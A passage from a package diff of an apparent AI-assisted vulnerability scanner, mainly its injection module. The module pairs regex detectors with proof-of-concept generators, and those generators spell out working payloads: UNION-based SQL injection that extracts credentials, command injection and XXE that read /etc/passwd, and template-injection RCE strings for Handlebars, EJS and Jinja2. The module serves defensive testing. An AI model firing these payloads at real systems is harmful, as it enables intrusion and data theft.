a,EAAE;YACb,8BAA8B;YAC9B,qBAAqB;YACrB,wBAAwB;SACzB;QACD,KAAK;QACL,OAAO,EAAE,4CAA4C;QACrD,cAAc,EAAE,wCAAwC;QACxD,oBAAoB,EAAE,uGAAuG;KAC9H,CAAC;AACJ,CAAC;AAED,SAAS,iBAAiB,CAAC,OAAsB;IAC/C,MAAM,KAAK,GAAiB;QAC1B;YACE,KAAK,EAAE,CAAC;YACR,MAAM,EAAE,2BAA2B;YACnC,WAAW,EAAE,yCAAyC;YACtD,OAAO,EAAE,yCAAyC;YAClD,cAAc,EAAE,oCAAoC;SACrD;QACD;YACE,KAAK,EAAE,CAAC;YACR,MAAM,EAAE,sBAAsB;YAC9B,WAAW,EAAE,gDAAgD;YAC7D,OAAO,EAAE,uDAAuD;YAChE,cAAc,EAAE,uBAAuB;SACxC;QACD;YACE,KAAK,EAAE,CAAC;YACR,MAAM,EAAE,qBAAqB;YAC7B,WAAW,EAAE,mDAAmD;YAChE,OAAO,EAAE,kBAAkB;YAC3B,cAAc,EAAE,gCAAgC;SACjD;KACF,CAAC;IAEF,OAAO;QACL,EAAE,EAAE,OAAO,OAAO,CAAC,EAAE,EAAE;QACvB,SAAS,EAAE,OAAO,CAAC,EAAE;QACrB,aAAa,EAAE;YACb,+CAA+C;YAC/C,qBAAqB;YACrB,2BAA2B;SAC5B;QACD,KAAK;QACL,OAAO,EAAE,yCAAyC;QAClD,cAAc,EAAE,sCAAsC;QACtD,oBAAoB,EAAE,4GAA4G;KACnI,CAAC;AACJ,CAAC;AAED,+EAA+E;AAC/E,kBAAkB;AAClB,+EAA+E;AAE/E,cAAc,CAAC,WAAW,CAAC,CAAC;AAE5B,OAAO,EAAE,WAAW,EAAE,CAAC"}

package/dist/agents/adversary/tactics/injection.d.ts

@@ -0,0 +1,12 @@
+/**
+ * Injection Tactics Module
+ *
+ * Detects injection vulnerabilities including SQL, Command, XXE, SSTI,
+ * and Code injection. Priority 1 - most common vulnerability class.
+ *
+ * @module agents/adversary/tactics/injection
+ */
+import type { TacticModule } from "./index.js";
+declare const injectionTactic: TacticModule;
+export { injectionTactic };
+//# sourceMappingURL=injection.d.ts.map

package/dist/agents/adversary/tactics/injection.d.ts.map

@@ -0,0 +1 @@
+{"version":3,"file":"injection.d.ts","sourceRoot":"","sources":["../../../../src/agents/adversary/tactics/injection.ts"],"names":[],"mappings":"AAAA;;;;;;;GAOG;AAGH,OAAO,KAAK,EACV,YAAY,EAKb,MAAM,YAAY,CAAC;AA8LpB,QAAA,MAAM,eAAe,EAAE,YAuItB,CAAC;AAwQF,OAAO,EAAE,eAAe,EAAE,CAAC"}

package/dist/agents/adversary/tactics/injection.js

@@ -0,0 +1,549 @@
+/**
+ * Injection Tactics Module
+ *
+ * Detects injection vulnerabilities including SQL, Command, XXE, SSTI,
+ * and Code injection. Priority 1 - most common vulnerability class.
+ *
+ * @module agents/adversary/tactics/injection
+ */
+import { registerTactic, generateFindingId, } from "./index.js";
+// ============================================================================
+// Patterns
+// ============================================================================
+const SQL_INJECTION_PATTERNS = [
+    {
+        id: "sql-string-concat",
+        name: "SQL String Concatenation",
+        description: "SQL query built with string concatenation",
+        cwe: "CWE-89",
+        severity: "critical",
+        regex: /(?:query|sql|execute|exec)\s*\(\s*[`'"].*?\$\{|(?:query|sql|execute)\s*\(\s*['"].*?\+/gi,
+    },
+    {
+        id: "sql-raw-query",
+        name: "Raw SQL Query with Variables",
+        description: "Raw SQL query with interpolated variables",
+        cwe: "CWE-89",
+        severity: "critical",
+        regex: /(?:SELECT|INSERT|UPDATE|DELETE|DROP|CREATE|ALTER|TRUNCATE)\s+.*?\$\{|\braw\s*\(\s*[`'"].*?\$\{/gi,
+    },
+    {
+        id: "sql-format-string",
+        name: "SQL Format String",
+        description: "SQL query using format strings or f-strings",
+        cwe: "CWE-89",
+        severity: "critical",
+        regex: /f['"'](?:SELECT|INSERT|UPDATE|DELETE).*?\{|\.format\s*\(.*?(?:SELECT|INSERT|UPDATE|DELETE)/gi,
+    },
+    {
+        id: "sql-prisma-raw",
+        name: "Prisma Raw Query",
+        description: "Prisma $queryRaw or $executeRaw with template literals",
+        cwe: "CWE-89",
+        severity: "high",
+        regex: /\$(?:queryRaw|executeRaw)\s*`[^`]*\$\{/gi,
+    },
+];
+const COMMAND_INJECTION_PATTERNS = [
+    {
+        id: "cmd-exec-concat",
+        name: "Command Execution with Concatenation",
+        description: "Shell command built with string concatenation",
+        cwe: "CWE-78",
+        severity: "critical",
+        regex: /(?:exec|execSync|spawn|spawnSync|system|popen)\s*\([^)]*\$\{|(?:exec|execSync)\s*\([^)]*\+/gi,
+    },
+    {
+        id: "cmd-shell-true",
+        name: "Shell True with User Input",
+        description: "spawn/exec with shell:true and potential user input",
+        cwe: "CWE-78",
+        severity: "critical",
+        regex: /spawn\s*\([^)]*,\s*\{[^}]*shell\s*:\s*true/gi,
+    },
+    {
+        id: "cmd-backtick",
+        name: "Shell Backtick Execution",
+        description: "Backtick shell execution with variables",
+        cwe: "CWE-78",
+        severity: "critical",
+        regex: /child_process.*?`.*?\$\{/gi,
+    },
+    {
+        id: "cmd-os-system",
+        name: "OS System Call",
+        description: "Python os.system or subprocess with shell=True",
+        cwe: "CWE-78",
+        severity: "critical",
+        regex: /os\.system\s*\(.*?f['"']|subprocess\.[^)]*shell\s*=\s*True/gi,
+    },
+];
+const XXE_PATTERNS = [
+    {
+        id: "xxe-parse-no-disable",
+        name: "XML Parsing Without DTD Disabled",
+        description: "XML parsing without disabling external entities",
+        cwe: "CWE-611",
+        severity: "high",
+        regex: /(?:parseString|parse|fromstring|XMLParser)\s*\([^)]*\)(?![^;]*(?:resolve_entities|no_network|DTD|external_entities))/gi,
+    },
+    {
+        id: "xxe-dom-parser",
+        name: "DOMParser Without Configuration",
+        description: "DOMParser used without secure configuration",
+        cwe: "CWE-611",
+        severity: "medium",
+        regex: /new\s+DOMParser\s*\(\s*\)/gi,
+    },
+    {
+        id: "xxe-libxml",
+        name: "libxml2 Unsafe Defaults",
+        description: "libxml2 parsing with potentially unsafe defaults",
+        cwe: "CWE-611",
+        severity: "high",
+        regex: /etree\.parse|etree\.fromstring|lxml\.etree/gi,
+    },
+];
+const SSTI_PATTERNS = [
+    {
+        id: "ssti-handlebars",
+        name: "Handlebars Template with User Input",
+        description: "Handlebars.compile with potential user-controlled template",
+        cwe: "CWE-1336",
+        severity: "critical",
+        regex: /Handlebars\.compile\s*\([^)]*(?:req\.|params\.|query\.|body\.|\$\{)/gi,
+    },
+    {
+        id: "ssti-ejs-render",
+        name: "EJS Render with User Input",
+        description: "EJS render with user-controlled data",
+        cwe: "CWE-1336",
+        severity: "high",
+        regex: /ejs\.render\s*\([^,]*,[^)]*(?:req\.|params\.|query\.|body\.)/gi,
+    },
+    {
+        id: "ssti-jinja2",
+        name: "Jinja2 Template from String",
+        description: "Jinja2 Template() with user-controlled string",
+        cwe: "CWE-1336",
+        severity: "critical",
+        regex: /Template\s*\([^)]*(?:request\.|args\.|form\.|f['"'])/gi,
+    },
+    {
+        id: "ssti-pug-compile",
+        name: "Pug Compile with User Input",
+        description: "Pug.compile with user-controlled template",
+        cwe: "CWE-1336",
+        severity: "high",
+        regex: /pug\.compile\s*\([^)]*(?:req\.|params\.|query\.|body\.)/gi,
+    },
+];
+const CODE_INJECTION_PATTERNS = [
+    {
+        id: "code-eval",
+        name: "Eval with User Input",
+        description: "eval() with potentially user-controlled input",
+        cwe: "CWE-94",
+        severity: "critical",
+        regex: /\beval\s*\([^)]*(?:req\.|params\.|query\.|body\.|\$\{|input|data|user)/gi,
+    },
+    {
+        id: "code-function-constructor",
+        name: "Function Constructor",
+        description: "new Function() with dynamic code",
+        cwe: "CWE-94",
+        severity: "critical",
+        regex: /new\s+Function\s*\([^)]*(?:\+|\$\{|concat)/gi,
+    },
+    {
+        id: "code-vm-run",
+        name: "VM RunIn* with User Input",
+        description: "Node.js vm.runIn* with user-controlled code",
+        cwe: "CWE-94",
+        severity: "critical",
+        regex: /vm\.runIn(?:Context|NewContext|ThisContext)\s*\([^)]*(?:req\.|body\.|params\.|\$\{)/gi,
+    },
+    {
+        id: "code-python-exec",
+        name: "Python exec/compile",
+        description: "Python exec() or compile() with user input",
+        cwe: "CWE-94",
+        severity: "critical",
+        regex: /(?:exec|compile)\s*\([^)]*(?:request\.|args\.|form\.|input\()/gi,
+    },
+    {
+        id: "code-settimeout-string",
+        name: "setTimeout/setInterval with String",
+        description: "setTimeout/setInterval with string argument",
+        cwe: "CWE-94",
+        severity: "medium",
+        regex: /set(?:Timeout|Interval)\s*\(\s*[`'"]/gi,
+    },
+];
+// ============================================================================
+// Tactic Implementation
+// ============================================================================
+const injectionTactic = {
+    focusArea: "injection",
+    name: "Injection",
+    description: "Detects SQL, Command, XXE, SSTI, and Code injection vulnerabilities",
+    patterns: [
+        ...SQL_INJECTION_PATTERNS,
+        ...COMMAND_INJECTION_PATTERNS,
+        ...XXE_PATTERNS,
+        ...SSTI_PATTERNS,
+        ...CODE_INJECTION_PATTERNS,
+    ],
+    async analyzeFile(file, config) {
+        const findings = [];
+        for (const pattern of this.patterns) {
+            if (!pattern.regex)
+                continue;
+            // Reset regex state
+            pattern.regex.lastIndex = 0;
+            let match;
+            while ((match = pattern.regex.exec(file.content)) !== null) {
+                // Calculate line number
+                const beforeMatch = file.content.substring(0, match.index);
+                const lineNum = (beforeMatch.match(/\n/g) || []).length + 1;
+                // Skip if in comment
+                const line = file.lines[lineNum - 1] || "";
+                if (isInComment(line, match.index - beforeMatch.lastIndexOf("\n"))) {
+                    continue;
+                }
+                // Skip if in test file
+                if (file.relativePath.includes("test") || file.relativePath.includes("spec")) {
+                    continue;
+                }
+                const finding = {
+                    id: generateFindingId("injection", file.relativePath, lineNum, pattern.id),
+                    tacticName: "injection",
+                    focusArea: "injection",
+                    patternId: pattern.id,
+                    file: file.relativePath,
+                    line: lineNum,
+                    message: `${pattern.name}: ${pattern.description}`,
+                    severity: pattern.severity,
+                    confidence: calculateConfidence(match[0], pattern, file),
+                    evidence: match[0].substring(0, 200),
+                    cweIds: [pattern.cwe],
+                    mitreIds: getMitreIds(pattern.id),
+                    suggestedFix: getSuggestedFix(pattern.id),
+                };
+                findings.push(finding);
+            }
+        }
+        return findings;
+    },
+    async generatePoC(finding) {
+        const pocMap = {
+            "sql-string-concat": () => sqlInjectionPoC(finding),
+            "sql-raw-query": () => sqlInjectionPoC(finding),
+            "sql-format-string": () => sqlInjectionPoC(finding),
+            "sql-prisma-raw": () => sqlInjectionPoC(finding),
+            "cmd-exec-concat": () => commandInjectionPoC(finding),
+            "cmd-shell-true": () => commandInjectionPoC(finding),
+            "cmd-backtick": () => commandInjectionPoC(finding),
+            "cmd-os-system": () => commandInjectionPoC(finding),
+            "xxe-parse-no-disable": () => xxePoC(finding),
+            "ssti-handlebars": () => sstiPoC(finding, "handlebars"),
+            "ssti-ejs-render": () => sstiPoC(finding, "ejs"),
+            "ssti-jinja2": () => sstiPoC(finding, "jinja2"),
+            "code-eval": () => codeInjectionPoC(finding),
+            "code-function-constructor": () => codeInjectionPoC(finding),
+            "code-vm-run": () => codeInjectionPoC(finding),
+        };
+        const generator = pocMap[finding.patternId];
+        return generator ? generator() : null;
+    },
+    getPromptEnhancement() {
+        return `When analyzing for injection vulnerabilities, focus on:
+
+1. **Data Flow Tracing**: Track how user input flows from entry points (req.body, req.query, req.params, form data, API payloads) to sensitive sinks (database queries, shell commands, template engines, eval).
+
+2. **SQL Injection Indicators**:
+   - String concatenation in SQL queries
+   - Template literals with variables in SQL
+   - Missing parameterized queries
+   - ORM raw query methods (Prisma $queryRaw, Sequelize.literal)
+
+3. **Command Injection Indicators**:
+   - spawn/exec with shell:true
+   - String concatenation in command arguments
+   - User input passed to child_process methods
+   - Backtick execution with variables
+
+4. **Template Injection (SSTI)**:
+   - User input in template compilation
+   - Dynamic template strings
+   - Missing template sandboxing
+
+5. **Code Injection**:
+   - eval() with external data
+   - new Function() with dynamic strings
+   - vm.runIn* with user content
+   - setTimeout/setInterval with string arguments
+
+For each potential vulnerability, determine:
+- Is there a clear path from user input to the sink?
+- Are there any sanitization or validation steps?
+- What's the exploitability in a realistic attack scenario?`;
+    },
+    getRelevantFilePatterns() {
+        return [
+            "**/api/**",
+            "**/routes/**",
+            "**/handlers/**",
+            "**/controllers/**",
+            "**/db/**",
+            "**/database/**",
+            "**/sql/**",
+            "**/graphql/**",
+            "**/*.ts",
+            "**/*.js",
+            "**/*.py",
+            "**/*.go",
+        ];
+    },
+};
+// ============================================================================
+// Helper Functions
+// ============================================================================
+function isInComment(line, position) {
+    const beforePos = line.substring(0, position);
+    return beforePos.includes("//") || beforePos.includes("/*") || beforePos.trimStart().startsWith("#");
+}
+function calculateConfidence(match, pattern, file) {
+    let confidence = 70;
+    // Higher confidence for obvious patterns
+    if (match.includes("req.") || match.includes("request.") || match.includes("body.")) {
+        confidence += 15;
+    }
+    // Higher confidence for critical severity
+    if (pattern.severity === "critical") {
+        confidence += 10;
+    }
+    // Lower confidence for minified or generated files
+    if (file.relativePath.includes(".min.") || file.relativePath.includes("bundle.")) {
+        confidence -= 20;
+    }
+    return Math.min(95, Math.max(50, confidence));
+}
+function getMitreIds(patternId) {
+    const mapping = {
+        "sql-string-concat": ["T1190", "T1059"],
+        "sql-raw-query": ["T1190", "T1059"],
+        "cmd-exec-concat": ["T1059", "T1203"],
+        "cmd-shell-true": ["T1059", "T1203"],
+        "xxe-parse-no-disable": ["T1190", "T1203"],
+        "ssti-handlebars": ["T1059", "T1203"],
+        "code-eval": ["T1059", "T1203"],
+        "code-function-constructor": ["T1059", "T1203"],
+    };
+    return mapping[patternId] || ["T1059"];
+}
+function getSuggestedFix(patternId) {
+    const fixes = {
+        "sql-string-concat": "Use parameterized queries or prepared statements instead of string concatenation",
+        "sql-raw-query": "Use ORM methods with proper escaping or parameterized queries",
+        "cmd-exec-concat": "Use spawn with array arguments instead of string concatenation, avoid shell:true",
+        "cmd-shell-true": "Remove shell:true and use array-based arguments",
+        "xxe-parse-no-disable": "Disable DTD processing and external entities in XML parser configuration",
+        "ssti-handlebars": "Never compile user-controlled templates; use precompiled templates with data binding",
+        "code-eval": "Avoid eval(); use JSON.parse for data, or a secure sandbox for code execution",
+        "code-function-constructor": "Avoid new Function() with dynamic content; use predefined functions",
+    };
+    return fixes[patternId] || "Review and sanitize user input before use in sensitive operations";
+}
+// ============================================================================
+// PoC Generators
+// ============================================================================
+function sqlInjectionPoC(finding) {
+    const steps = [
+        {
+            order: 1,
+            action: "identify-input",
+            description: "Identify the user input parameter that flows to the SQL query",
+            command: `Review ${finding.file}:${finding.line}`,
+            expectedResult: "Locate the input parameter (e.g., req.query.id, req.body.name)",
+        },
+        {
+            order: 2,
+            action: "test-basic",
+            description: "Test for SQL injection with a single quote",
+            command: `curl -X GET "https://target/api/endpoint?id=1'"`,
+            expectedResult: "SQL syntax error in response indicates vulnerability",
+        },
+        {
+            order: 3,
+            action: "confirm-injection",
+            description: "Confirm injection with boolean-based test",
+            command: `curl -X GET "https://target/api/endpoint?id=1' AND '1'='1"`,
+            expectedResult: "Normal response - confirms injection point",
+        },
+        {
+            order: 4,
+            action: "extract-data",
+            description: "Demonstrate data extraction capability",
+            command: `curl -X GET "https://target/api/endpoint?id=1' UNION SELECT null,username,password FROM users--"`,
+            expectedResult: "User credentials visible in response",
+        },
+    ];
+    return {
+        id: `poc-${finding.id}`,
+        findingId: finding.id,
+        prerequisites: [
+            "Access to the vulnerable endpoint",
+            "Understanding of the database schema (for UNION-based extraction)",
+        ],
+        steps,
+        payload: "' OR '1'='1",
+        expectedResult: "Unauthorized data access or authentication bypass",
+        safeTestInstructions: "Test only on isolated development/staging environments. Never test on production databases. Use a separate test database with synthetic data.",
+    };
+}
+function commandInjectionPoC(finding) {
+    const steps = [
+        {
+            order: 1,
+            action: "identify-input",
+            description: "Identify the user input that flows to the command execution",
+            command: `Review ${finding.file}:${finding.line}`,
+            expectedResult: "Locate the input parameter used in shell command",
+        },
+        {
+            order: 2,
+            action: "test-basic",
+            description: "Test for command injection with semicolon",
+            command: `curl -X POST "https://target/api/process" -d '{"filename": "test; whoami"}'`,
+            expectedResult: "Command output visible in response",
+        },
+        {
+            order: 3,
+            action: "confirm-blind",
+            description: "Confirm blind command injection with time delay",
+            command: `curl -X POST "https://target/api/process" -d '{"filename": "test; sleep 5"}'`,
+            expectedResult: "Response delayed by 5 seconds indicates blind injection",
+        },
+    ];
+    return {
+        id: `poc-${finding.id}`,
+        findingId: finding.id,
+        prerequisites: [
+            "Access to the vulnerable endpoint",
+            "Understanding of the server operating system",
+        ],
+        steps,
+        payload: "; cat /etc/passwd",
+        expectedResult: "System file contents or command output visible",
+        safeTestInstructions: "Test only on isolated systems. Use non-destructive commands like 'whoami' or 'id'. Never use 'rm', 'dd', or other destructive commands. Set up network monitoring to detect any outbound connections.",
+    };
+}
+function xxePoC(finding) {
+    const steps = [
+        {
+            order: 1,
+            action: "craft-payload",
+            description: "Craft XXE payload to read local file",
+            command: `Create XML: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>`,
+            expectedResult: "Payload ready for submission",
+        },
+        {
+            order: 2,
+            action: "submit-payload",
+            description: "Submit XXE payload to the endpoint",
+            command: `curl -X POST "https://target/api/parse" -H "Content-Type: application/xml" -d @xxe-payload.xml`,
+            expectedResult: "File contents visible in response",
+        },
+    ];
+    return {
+        id: `poc-${finding.id}`,
+        findingId: finding.id,
+        prerequisites: [
+            "Access to XML-accepting endpoint",
+            "Understanding of server file system layout",
+        ],
+        steps,
+        payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>',
+        expectedResult: "Local file contents disclosed",
+        safeTestInstructions: "Test on isolated systems only. Read non-sensitive files first (/etc/hostname). Never attempt SSRF or data exfiltration to external servers.",
+    };
+}
+function sstiPoC(finding, engine) {
+    const payloads = {
+        handlebars: "{{#with \"s\" as |string|}}{{#with \"e\"}}{{#with split as |conslist|}}{{this.pop}}{{this.push (lookup string.sub \"constructor\")}}{{this.pop}}{{#with string.split as |codelist|}}{{this.pop}}{{this.push \"return require('child_process').execSync('id');\"}}{{this.pop}}{{#each conslist}}{{#with (string.sub.apply 0 codelist)}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}",
+        ejs: "<%= global.process.mainModule.require('child_process').execSync('id') %>",
+        jinja2: "{{''.__class__.__mro__[1].__subclasses__()[407]('id',shell=True,stdout=-1).communicate()}}",
+    };
+    const steps = [
+        {
+            order: 1,
+            action: "test-expression",
+            description: "Test for template injection with arithmetic",
+            command: `Submit payload: ${engine === "jinja2" ? "{{7*7}}" : "${7*7}"}`,
+            expectedResult: "Response contains '49' - confirms template injection",
+        },
+        {
+            order: 2,
+            action: "escalate-rce",
+            description: "Escalate to remote code execution",
+            command: `Submit payload: ${payloads[engine] || "{{7*7}}"}`,
+            expectedResult: "Command output visible in response",
+        },
+    ];
+    return {
+        id: `poc-${finding.id}`,
+        findingId: finding.id,
+        prerequisites: [
+            "Access to endpoint accepting template input",
+            `Knowledge of ${engine} template engine syntax`,
+        ],
+        steps,
+        payload: payloads[engine] || "{{7*7}}",
+        expectedResult: "Remote code execution achieved",
+        safeTestInstructions: "Start with safe arithmetic expressions (7*7). Only escalate on isolated test environments. Never execute destructive commands.",
+    };
+}
+function codeInjectionPoC(finding) {
+    const steps = [
+        {
+            order: 1,
+            action: "identify-sink",
+            description: "Identify the eval/Function sink and its input source",
+            command: `Review ${finding.file}:${finding.line}`,
+            expectedResult: "Understand how user input reaches the code execution sink",
+        },
+        {
+            order: 2,
+            action: "test-basic",
+            description: "Test with simple expression",
+            command: `Submit: 1+1`,
+            expectedResult: "Response contains '2' - confirms code execution",
+        },
+        {
+            order: 3,
+            action: "escalate",
+            description: "Escalate to process access",
+            command: `Submit: require('child_process').execSync('id').toString()`,
+            expectedResult: "System command output visible",
+        },
+    ];
+    return {
+        id: `poc-${finding.id}`,
+        findingId: finding.id,
+        prerequisites: [
+            "Access to endpoint accepting code input",
+            "Understanding of Node.js runtime environment",
+        ],
+        steps,
+        payload: "require('child_process').execSync('id').toString()",
+        expectedResult: "Arbitrary code execution achieved",
+        safeTestInstructions: "Start with safe expressions (1+1). Test on isolated systems only. Never execute file system modifications or network operations.",
+    };
+}
+// ============================================================================
+// Register Tactic
+// ============================================================================
+registerTactic(injectionTactic);
+export { injectionTactic };
+//# sourceMappingURL=injection.js.map

package/dist/agents/adversary/tactics/injection.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"injection.js","sourceRoot":"","sources":["../../../../src/agents/adversary/tactics/injection.ts"],"names":[],"mappings":"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